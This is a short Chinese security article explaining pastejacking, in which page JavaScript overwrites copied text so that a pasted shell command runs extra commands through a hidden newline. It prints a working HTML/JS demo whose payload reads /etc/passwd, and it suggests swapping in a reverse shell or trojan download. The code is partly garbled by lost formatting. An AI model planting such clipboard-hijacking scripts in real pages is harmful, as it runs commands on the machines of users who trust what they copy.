專治複製粘貼癌症患者的Pastejacking

在linux bash下進行操作時難免因為懶，直接從別人的技術文章中複製相關的命令在bash下直接執行，為了治癒這種懶癌，應運而生的一種技術Pastejacking。原理很簡單，通過js代碼覆蓋某人的剪貼板中的內容達到欺騙眼睛的效果。操作流程如下：

訪問指定網頁，選擇相關內容，右鍵複製文字echo "not eval"。結果在記事本中粘貼出來的卻是echo "not eval" ncat /etc/passwdnecho "eval"。如果懶癌患者直接粘貼相關的文字命令在bash中執行，由於加入了換行符，使得命令「自動執行」，發現時已經無力回天了。

如果吧cat /etc/passwd可以替換為反彈shell或者下載木馬的腳本，就能實現一些意想不到的效果了。

關鍵代碼：

DOME:

<html>n <body>n 複製如下內容到bash命令行下執行.n </br>n <p>echo "not evil"</p>n <script>n function copyTextToClipboard(text) {n var textArea = document.createElement("textarea");n textArea.style.position = fixed;n textArea.style.top = 0;n textArea.style.left = 0;n textArea.style.width = 2em;n textArea.style.height = 2em;n textArea.style.padding = 0;n // Clean up any borders.n textArea.style.border = none;n textArea.style.outline = none;n textArea.style.boxShadow = none;n // Avoid flash of white box if rendered for any reason.n textArea.style.background = transparent;n textArea.value = text;n document.body.appendChild(textArea);n textArea.select();n try {n var successful = document.execCommand(copy);n var msg = successful ? successful : unsuccessful;n console.log(Copying text command was + msg);n } catch (err) {n console.log(Oops, unable to copy);n }n document.body.removeChild(textArea);n }n document.addEventListener(keydown, function(event) {n var ms = 800; n var start = new Date().getTime();n var end = start;n while(end < start + ms) {n end = new Date().getTime();n } n copyTextToClipboard(echo "not evil" ncat /etc/passwdn echo "evil" );n });n </script>n </body>n</html>n

本文為 echo 原創稿件，授權嘶吼獨家發布，未經許可禁止轉載，如若轉載，請聯繫嘶吼編輯： http://www.4hou.com/web/8005.html 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：